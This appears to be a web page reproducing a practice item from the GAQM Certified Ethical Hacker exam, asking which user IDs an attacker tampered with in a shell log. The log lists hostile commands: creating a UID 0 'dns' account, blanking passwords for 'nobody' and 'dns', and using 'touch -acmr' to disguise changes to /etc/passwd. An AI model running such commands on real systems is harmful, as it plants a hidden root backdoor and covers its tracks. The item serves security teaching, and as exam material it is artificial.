GAQM Certified Ethical Hacker (CEH) CEH-001 Question # 251 Topic 26 Discussion

GAQM Certified Ethical Hacker (CEH) CEH-001 Question # 251 Topic 26 Discussion

CEH-001 Exam Topic 26 Question 251 Discussion:
Question #: 251
Topic #: 26

After studying the following log entries, how many user IDs can you identify that the attacker has tampered with?

1. mkdir -p /etc/X11/applnk/Internet/.etc

2. mkdir -p /etc/X11/applnk/Internet/.etcpasswd

3. touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd

4. touch -acmr /etc /etc/X11/applnk/Internet/.etc

5. passwd nobody -d

6. /usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash

7. passwd dns -d

8. touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd

9. touch -acmr /etc/X11/applnk/Internet/.etc /etc


A.

IUSR_


B.

acmr, dns


C.

nobody, dns


D.

nobody, IUSR_


Get Premium CEH-001 Questions

Contribute your Thoughts:


Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.